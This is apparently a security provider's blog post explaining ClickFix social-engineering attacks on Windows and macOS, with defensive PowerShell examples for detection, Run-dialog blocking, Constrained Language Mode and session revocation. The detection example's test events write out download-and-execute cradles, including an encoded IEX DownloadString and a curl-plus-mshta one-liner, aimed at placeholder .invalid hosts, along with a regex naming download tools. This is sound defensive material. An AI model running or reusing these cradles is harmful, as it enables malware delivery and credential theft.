What Is a ClickFix Attack?
Most phishing attacks try to sneak malware past your security tools. ClickFix takes a completely different approach: it convinces your employees to install the malware themselves.
The concept is simple and surprisingly effective. An employee visits what looks like a normal webpage, maybe through a link in an email or a search result. The page displays a fake error message, something like a Cloudflare verification check, a browser update prompt, or an SSL certificate warning. Then it tells the user to "fix" the problem by opening a system tool and pasting a command.
The employee thinks they are completing a routine verification step. What they are actually doing is running a script that downloads malware directly onto their machine. Because the command starts from a system tool the user opened (the Run dialog, PowerShell, Terminal) rather than from a document or a browser download, process-lineage detections tuned to those traditional patterns often do not fire.
According to a 2025 Huntress Cyber Threat Report, ClickFix was responsible for more than half of all malware loader activity that year. And in 2026, the technique has gotten significantly more sophisticated.
How ClickFix Works Step by Step
Understanding the mechanics helps you explain it to your team. Here is the typical flow on a Windows machine:
Step 1: The Lure
The employee receives an email or clicks a link that takes them to a page that looks legitimate. Common disguises include fake Cloudflare CAPTCHA pages, browser update notifications, SSL certificate errors, and font installation prompts. Recent campaigns have also impersonated Intuit QuickBooks and Booking.com, which makes them particularly convincing for office workers who use those tools daily.
Step 2: The Fake Error
The page displays a message telling the user something is wrong and needs to be fixed. It might say "Human verification required," "Your browser needs an update," or "Session expired - please verify." The message looks professional and matches the design of whatever service it is impersonating.
Step 3: The Instructions
Instead of asking the user to click a button or download a file (the kind of action that download scanning and attachment filters are built to catch), the page tells them to:
1. Press Windows + R to open the Run dialog
2. Press Ctrl + V to paste a command (which was silently copied to their clipboard)
3. Press Enter to execute it
Some newer variants spotted by Microsoft in February 2026 switched to Windows + X (which opens the Power User menu) followed by pressing I to launch Windows Terminal. This bypasses detections specifically tuned to the Run dialog.
Step 4: The Payload
The pasted command typically launches PowerShell (often with its window hidden and the execution policy bypassed), downloads a script from an attacker-controlled server, and executes it in memory. The whole process takes seconds. The malware can be an infostealer, a remote access trojan, or ransomware. Recent campaigns have deployed Lumma Stealer, Atomic Stealer, and Venom Stealer variants.
ClickFix Now Targets Mac Users Too
If you think this is just a Windows problem, think again. ClickFix campaigns have been hitting macOS since late 2025, and they are evolving fast.
The original Mac version followed the same playbook: trick the user into opening Terminal and pasting a command. Apple responded in macOS Tahoe 26.4 by adding a warning that blocks pasting suspected malicious commands into Terminal with the message "Possible malware, paste blocked."
But attackers adapted within weeks. Researchers at Jamf found a new variant in April 2026 that sidesteps Terminal entirely. Instead of asking users to paste commands, it uses the applescript:// URL scheme to open Script Editor with a pre-filled script that claims to be a system maintenance tool. The fake script shows a dialog saying "Freed 24.7 GB" while it quietly downloads Atomic Stealer in the background.
The shift from "paste this scary command" to "click this button to clean your Mac" makes the attack even more convincing. Employees who would never open Terminal might happily click a button that promises to free up disk space.
Why Traditional Security Tools Miss ClickFix
This is what makes ClickFix so frustrating from an IT security perspective. The attack is specifically designed to exploit a blind spot in how most security tools work.
Traditional endpoint protection monitors for suspicious processes, malicious files being written to disk, and unusual parent-child process relationships. When malware arrives as an email attachment or a drive-by download, these tools catch it reliably.
But ClickFix flips the model. The user opens a legitimate system tool (the Run dialog, PowerShell, Terminal) and manually executes a command, so the process chain starts under explorer.exe or a terminal rather than under an Office document or a browser download, which is where most parent-child rules look. From the security software's perspective, this looks like a normal user action. The malicious script often runs entirely in memory without writing files to disk, which means there is nothing for file-based scanning to detect.
As BlackFog researchers noted about the Venom Stealer kit, the process "appears user-initiated and bypasses detection logic built around parent-child process relationships." BlackFog also reports that the kit defeats Chrome's v10 and v20 password encryption through a silent privilege escalation that extracts the decryption keys without triggering a UAC prompt.
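The lineage argument above cuts both ways: the chain that ClickFix produces (explorer.exe or Windows Terminal spawning powershell.exe with a download cradle on the command line) is itself distinctive once you look at parent and command line together. The following is an added example, not code from the article or from any vendor's product. It is a rule of the kind an EDR query or a Sysmon Event ID 1 search would implement, run offline over five constructed events: the Win+R variant, the Win+X Terminal variant with an -EncodedCommand payload, a cmd.exe one-liner that stages an HTA, and two benign launches. The executable paths, the example.invalid URLs and the indicator weights are all assumptions to tune for your own estate.

```powershell
# Added example, not code from the original article. The events below are
# constructed to look like process-creation telemetry; nothing here touches a
# live system, and the URLs use the reserved .invalid TLD so they never resolve.

# Build a real -EncodedCommand payload (UTF-16LE, base64) so the decode step is exercised.
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes(
    'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/v.ps1")'))

$events = @(
    # Win+R, Ctrl+V, Enter: the Run dialog launches its child under explorer.exe
    [pscustomobject]@{ ParentImage = 'C:\Windows\explorer.exe'
                       Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'powershell -w hidden -ep bypass -c "iwr http://example.invalid/v.ps1 | iex"' }
    # Win+X, I: pasted into Windows Terminal, cradle hidden behind -EncodedCommand
    [pscustomobject]@{ ParentImage = 'C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.0.0.0_x64__8wekyb3d8bbwe\WindowsTerminal.exe'
                       Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = "powershell -nop -w hidden -enc $encoded" }
    # A cmd.exe one-liner pasted into the Run dialog that downloads and runs an HTA
    [pscustomobject]@{ ParentImage = 'C:\Windows\explorer.exe'
                       Image       = 'C:\Windows\System32\cmd.exe'
                       CommandLine = 'cmd /c curl -s https://example.invalid/a.hta -o %TEMP%\a.hta & mshta %TEMP%\a.hta' }
    # Benign: a user opened PowerShell from the Start menu
    [pscustomobject]@{ ParentImage = 'C:\Windows\explorer.exe'
                       Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = '"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"' }
    # Benign: a scheduled task, whose parent is never interactive
    [pscustomobject]@{ ParentImage = 'C:\Windows\System32\svchost.exe'
                       Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'powershell -File C:\Scripts\nightly-backup.ps1' }
)

# Command-line traits of a download cradle, each with an assumed weight.
$indicators = @(
    @{ Name = 'DownloadCradle';  Weight = 2; Pattern = '(?i)\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|net\.webclient|start-bitstransfer|curl|certutil)\b' }
    @{ Name = 'InlineExecution'; Weight = 1; Pattern = '(?i)\b(iex|invoke-expression)\b' }
    @{ Name = 'ScriptHost';      Weight = 1; Pattern = '(?i)\bmshta\b' }
    @{ Name = 'HiddenWindow';    Weight = 1; Pattern = '(?i)-w(indowstyle)?\s+hidden' }
    @{ Name = 'PolicyBypass';    Weight = 1; Pattern = '(?i)-e(p|x\w*)\s+bypass' }
    @{ Name = 'EncodedCommand';  Weight = 2; Pattern = '(?i)-e(c|nc\w*)?\s+([A-Za-z0-9+/=]{20,})' }
)
$weights = @{}
foreach ($i in $indicators) { $weights[$i.Name] = $i.Weight }

function Get-CommandLineIndicators {
    param([string]$Text)
    $hits = [System.Collections.Generic.List[string]]::new()
    foreach ($i in $indicators) {
        $m = [regex]::Match($Text, $i.Pattern)
        if (-not $m.Success) { continue }
        $hits.Add($i.Name)
        # -EncodedCommand hides the real cradle: decode the UTF-16LE payload and scan it too
        if ($i.Name -eq 'EncodedCommand') {
            try {
                $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($m.Groups[2].Value))
                foreach ($n in (Get-CommandLineIndicators -Text $decoded)) {
                    if ($n -notin $hits) { $hits.Add($n) }
                }
            } catch { }   # not valid base64: keep the EncodedCommand hit and move on
        }
    }
    return $hits
}

function Test-ClickFixLineage {
    param([Parameter(Mandatory)][psobject]$Event, [int]$Threshold = 3)

    # ClickFix lures walk the user into the Run dialog (child of explorer.exe),
    # Windows Terminal (Win+X, I) or a cmd.exe one-liner. Parents that are never
    # interactive (services, scheduled tasks) are out of scope for this rule.
    $interactiveParents = 'explorer.exe', 'WindowsTerminal.exe', 'cmd.exe'
    $lolbins = 'powershell.exe', 'pwsh.exe', 'cmd.exe', 'mshta.exe', 'curl.exe', 'certutil.exe', 'bitsadmin.exe'

    $parent = ($Event.ParentImage -split '\\')[-1]
    $child  = ($Event.Image -split '\\')[-1]
    if ($parent -notin $interactiveParents -or $child -notin $lolbins) { return $null }

    $hits  = Get-CommandLineIndicators -Text $Event.CommandLine
    $score = 0
    foreach ($h in $hits) { $score += $weights[$h] }
    [pscustomobject]@{
        Parent     = $parent
        Child      = $child
        Indicators = ($hits -join ',')
        Score      = $score
        Suspicious = ($score -ge $Threshold)
    }
}

$events | ForEach-Object { Test-ClickFixLineage -Event $_ } |
    Where-Object { $_ -and $_.Suspicious } |
    Format-Table Parent, Child, Score, Indicators -AutoSize
```

The rule deliberately keys on the interactive parents that a ClickFix lure steers the user into, which is exactly the lineage that rules written for Office-to-PowerShell chains ignore. The interactive PowerShell launch scores zero and the scheduled task is skipped outright, while all three pasted commands clear the threshold; the -EncodedCommand case only gets there because the base64 is decoded and rescanned, which is the step most worth carrying into a production query.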
The Commercialization Problem: ClickFix-as-a-Service
What turned ClickFix from a clever trick into a widespread threat is commercialization. Attackers no longer need to build their own ClickFix infrastructure. They can buy it off the shelf.
The Venom Stealer kit, documented by BlackFog in April 2026, sells as a subscription service starting at $250 per month with lifetime access available for $1,800. It ships with four ready-made templates for both Windows and macOS: a fake Cloudflare CAPTCHA, a fake OS update, a fake SSL certificate error, and a fake font installation page.
The kit includes a full operator panel where attackers can customize their campaigns, track infections, and manage stolen data. It even has a 15% affiliate program and a Telegram-based licensing system. This is organized crime with a SaaS business model.
What this means for businesses: the barrier to entry for running ClickFix attacks is now extremely low. You do not need to be a skilled hacker. You need $250 and a Telegram account.
What Gets Stolen in a ClickFix Attack
The damage from a successful ClickFix attack is immediate and comprehensive. Modern infostealers deployed through ClickFix do not just grab one thing. They sweep everything they can find in seconds.
Here is what typically gets exfiltrated:
Browser data: Saved passwords, session cookies, browsing history, autofill data, and stored credit card numbers from every Chromium and Firefox-based browser profile on the machine.
Business application credentials: Login tokens for Microsoft 365, Google Workspace, QuickBooks, banking portals, CRM systems, and any other web application the employee was logged into.
Cryptocurrency wallets: Private keys and seed phrases from browser-based wallet extensions.
System information: Hardware fingerprint, installed software, browser extensions, and network configuration. This gives attackers a complete profile for planning follow-up attacks.
The stolen session cookies are particularly dangerous. An attacker with a valid session cookie can log into your Microsoft 365 or banking portal without needing a password or passing multi-factor authentication. They are already "authenticated" as your employee.
How to Protect Your Business from ClickFix
There is no single fix that stops ClickFix, because the core vulnerability is human behavior. But a layered approach makes a real difference.
Train Your Team on What ClickFix Looks Like
Your employees need to know one simple rule: no legitimate website will ever ask you to open Run, PowerShell, Terminal, or Script Editor and paste a command. That is the red flag. If a webpage asks you to leave your browser and run something on your computer, close the tab immediately.
Include ClickFix examples in your security awareness training. Show your team what fake Cloudflare verifications and browser update prompts look like. The more familiar they are with the trick, the less likely they are to fall for it.
Disable the Windows Run Dialog via Group Policy
If your employees do not need the Run dialog for their daily work (and most do not), you can disable it entirely through Group Policy. Recorded Future recommends this as a key defensive measure. Navigate to User Configuration, Administrative Templates, Start Menu and Taskbar, and enable "Remove Run menu from Start Menu." This blocks the Win+R shortcut that most ClickFix variants rely on. It does not stop the Win+X variant that opens Windows Terminal, or a user typing "powershell" into the Start menu search, so pair it with application control that limits who can launch powershell.exe, cmd.exe, and mshta.exe.
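The policy above is a registry value under the Explorer policies key, which matters when you manage machines with a script or an MDM rather than a domain GPO. The following is an added example, not code from the article: it sets the value for the current user and verifies it. The key path is the one the policy writes; treating NoRun as the only control is an assumption to avoid, for the reasons given above.

```powershell
# Added example, not code from the original article. "Remove Run menu from
# Start Menu" writes NoRun=1 under the per-user Explorer policies key; use the
# same subkey under HKLM: for a machine-wide setting. Explorer reads the value
# at logon, so the user must sign out and back in for Win+R to be blocked.

$policyKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'

function Set-RunDialogPolicy {
    param([switch]$Block)   # -Block disables Run; without it the restriction is removed
    if (-not (Test-Path $policyKey)) { New-Item -Path $policyKey -Force | Out-Null }
    if ($Block) {
        New-ItemProperty -Path $policyKey -Name 'NoRun' -PropertyType DWord -Value 1 -Force | Out-Null
    } else {
        Remove-ItemProperty -Path $policyKey -Name 'NoRun' -ErrorAction SilentlyContinue
    }
}

function Test-RunDialogBlocked {
    # Missing key or missing value both read as "not blocked"
    $value = (Get-ItemProperty -Path $policyKey -Name 'NoRun' -ErrorAction SilentlyContinue).NoRun
    return ($value -eq 1)
}

Set-RunDialogPolicy -Block
"Run dialog blocked for this user (after next logon): $(Test-RunDialogBlocked)"
```

Run Test-RunDialogBlocked from your compliance checks to catch machines where the policy was never applied or has since been undone, and remember that it says nothing about Windows Terminal, PowerShell launched from the Start menu, or the macOS variants.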
Enable PowerShell Constrained Language Mode
PowerShell Constrained Language Mode (CLM) restricts what PowerShell can do, blocking most .NET classes, COM objects, Add-Type, and other features that ClickFix payloads depend on. It is enforced by an application control policy such as WDAC or AppLocker in enforce mode (the __PSLockdownPolicy environment variable only imitates it for testing and is trivially undone), and the legacy Windows PowerShell 2.0 engine does not honor it at all, so remove that optional feature as well. With those in place, a pasted command can accomplish far less even if an employee does fall for the trick.
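To see what CLM actually takes away from a pasted cradle, the following added example (not code from the article) runs two probes under Full Language and then again after downgrading the session to Constrained Language. Both probes construct what a download cradle relies on, a .NET web client object and a method call on a non-core .NET type, without touching the network, so the verdict reflects policy rather than connectivity. The probe list is an assumption chosen for illustration.

```powershell
# Added example, not code from the original article. A session can be lowered
# to ConstrainedLanguage with the assignment below but never raised again, so
# run this in a throwaway window. Production enforcement comes from WDAC or
# AppLocker, not from this assignment.

# The probes are strings evaluated with Invoke-Expression rather than script
# blocks: a script block remembers the language mode it was created in, so one
# written before the downgrade would still run in Full Language afterwards.
$probes = [ordered]@{
    'New-Object System.Net.WebClient'      = 'New-Object System.Net.WebClient'
    '[System.Net.Dns]::GetHostName()'      = '[System.Net.Dns]::GetHostName()'
}

# Promote non-terminating cmdlet errors so CLM refusals land in the catch block
$ErrorActionPreference = 'Stop'

foreach ($phase in 'before', 'after') {
    if ($phase -eq 'after') {
        $ExecutionContext.SessionState.LanguageMode = 'ConstrainedLanguage'
    }
    "Language mode now: $($ExecutionContext.SessionState.LanguageMode)"
    foreach ($name in $probes.Keys) {
        try {
            Invoke-Expression $probes[$name] | Out-Null
            $verdict = 'ran'
        } catch {
            # The error id names the CLM gate that fired (type creation, method invocation)
            $verdict = "blocked: $($_.FullyQualifiedErrorId)"
        }
        '  {0,-36} {1}' -f $name, $verdict
    }
}
```

Both probes run in the first pass and are refused in the second, which is the difference a pasted "New-Object Net.WebClient ... | iex" one-liner meets on a machine where CLM is enforced. Note that a pasted command can still run cmdlets such as Invoke-WebRequest under CLM; the value of the mode is in pairing it with the application control policy that enforces it, so the downloaded script is itself blocked from running with full privileges.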
Keep macOS Updated
If your office uses Macs, make sure they are running macOS Tahoe 26.4 or later. Apple's new Terminal paste protection is not perfect (attackers are already working around it), but it adds a meaningful speed bump that can stop less sophisticated variants.
Deploy Endpoint Detection and Response (EDR)
While standard antivirus misses ClickFix, a properly configured EDR solution can catch the post-execution behavior: unusual PowerShell activity, connections to known malicious domains, credential harvesting from browser stores, and data exfiltration. EDR monitors behavior patterns rather than just file signatures, which makes it far more effective against living-off-the-land attacks.
Implement DNS Filtering
DNS filtering blocks connections to known malicious domains. Even if an employee runs a ClickFix command, the script cannot download its payload if the domain it reaches out to is blocked at the DNS level. This is one of the most cost-effective layers you can add to your cybersecurity stack.
Use a Password Manager
If your team uses a password manager instead of saving passwords in their browser, a ClickFix infostealer has far less to steal. Browser-saved passwords are the single biggest prize in these attacks. Moving to a dedicated password manager with a separate master password keeps credentials out of the browser's password store entirely.
What to Do If You Suspect a ClickFix Infection
If an employee reports that they followed instructions on a webpage to paste a command into Run, PowerShell, or Terminal, treat it as a confirmed compromise until proven otherwise. Speed matters here.
1. Disconnect the machine from the network immediately. Do not shut it down (you may lose forensic data in memory), but unplug the Ethernet cable and disable Wi-Fi.
2. Revoke all active sessions and refresh tokens for every account that was logged in on that machine. This includes Microsoft 365, Google Workspace, banking portals, and any SaaS applications. Stolen session cookies work until the session is revoked, and MFA never enters into it.
3. Reset all passwords stored in the browser on that machine. If the employee used Chrome or Edge with saved passwords, assume every one of those credentials is compromised.
4. Run a full EDR scan on the machine and any other devices that share credentials with the affected user.
5. Check for unauthorized access to email, file shares, and financial accounts. Infostealers often enable follow-up attacks like business email compromise or wire fraud.
6. Report the phishing page to your IT team or managed SOC provider so the domain can be blocked across your network.
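Step 2 is the one most often done too slowly because it is done by hand across several consoles. For a Microsoft 365 tenant it is two calls, shown here as an added example that is not code from the article: it uses the Microsoft Graph PowerShell SDK (Install-Module Microsoft.Graph.Users and Microsoft.Graph.Users.Actions), the user principal name is a placeholder, and the single User.ReadWrite.All scope is an assumption; the identity running it must already hold an admin role allowed to act on that user. Google Workspace, banking portals and other SaaS tools need the equivalent action in their own admin consoles.

```powershell
# Added example, not code from the original article. Requires the Microsoft
# Graph PowerShell SDK and an admin identity that can act on the target user.

$UserPrincipalName = 'compromised.user@example.com'   # placeholder, replace before use

Connect-MgGraph -Scopes 'User.ReadWrite.All' -NoWelcome

$user = Get-MgUser -UserId $UserPrincipalName -Property Id, UserPrincipalName, AccountEnabled

# Block new sign-ins first, so the attacker cannot simply re-authenticate with a
# stolen password while you work. Re-enable the account after the credential reset.
Update-MgUser -UserId $user.Id -AccountEnabled:$false

# Invalidate every refresh token and session issued before this moment. Access
# tokens already in the attacker's hands keep working until they expire (roughly
# an hour), so record the time for later triage of the sign-in logs.
$revokedAt = (Get-Date).ToUniversalTime()
Revoke-MgUserSignInSession -UserId $user.Id | Out-Null

[pscustomobject]@{
    User           = $user.UserPrincipalName
    SignInsBlocked = -not (Get-MgUser -UserId $user.Id -Property AccountEnabled).AccountEnabled
    RevokedAtUtc   = $revokedAt.ToString('o')
}
```

Keep the returned timestamp with the incident record: any sign-in for that user after RevokedAtUtc that you did not perform yourself is a lead, not noise.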
Having an incident response plan documented before something happens makes the difference between a contained incident and a full-blown breach.
ClickFix FAQ
Can antivirus software detect ClickFix attacks?
Traditional antivirus has a hard time with ClickFix because the malicious action is initiated by the user through a legitimate system tool. The malware often runs in memory without writing files to disk, which bypasses file-based scanning. EDR solutions that monitor behavioral patterns are more effective because they can detect the suspicious post-execution activity like credential harvesting and data exfiltration, even when the initial command looked legitimate.
What is the difference between ClickFix and regular phishing?
Regular phishing tries to get you to click a malicious link, open an infected attachment, or enter your credentials on a fake login page. ClickFix goes a step further by getting you to execute a command on your own computer, which installs malware directly. This makes it harder for security tools to block because the execution comes from a trusted system process that the user started themselves.
Are small businesses being targeted by ClickFix?
Yes. Recent ClickFix campaigns have specifically impersonated Intuit QuickBooks, which is widely used by small and mid-sized businesses. The commercialization of ClickFix through kits like Venom Stealer (starting at $250/month) means that attackers can target businesses of any size with minimal effort. Small businesses are often more vulnerable because they may lack dedicated security training programs and advanced endpoint protection.
Does multi-factor authentication protect against ClickFix?
MFA protects your login credentials, but ClickFix infostealers also steal active session cookies. An attacker with a stolen session cookie can access your accounts without needing your password or MFA code, because the session is already authenticated. This is why forcing session expiration across all accounts is critical if you suspect a ClickFix infection.
What should I tell my employees about ClickFix?
Keep it simple: no real website will ever ask you to open Run, PowerShell, Terminal, or any system tool and paste a command to complete a verification or fix an error. If a webpage gives you those instructions, close the tab and report it to IT. That one rule covers every ClickFix variant currently in the wild.
Staying Ahead of Social Engineering
ClickFix is a reminder that the most dangerous attacks do not always exploit software vulnerabilities. Sometimes they exploit trust and routine. An employee who has pasted text hundreds of times without a second thought is not going to hesitate when a convincing-looking webpage tells them to do it one more time.
The best defense is a combination of technical controls (Group Policy restrictions, EDR, DNS filtering) and human awareness. Your team does not need to become security experts; they just need to know that one red line: never paste commands from a website into a system tool.
If your business needs help setting up these protections or running security awareness training for your team, Burgi Technologies is happy to help. You can reach us at (949) 381-1010.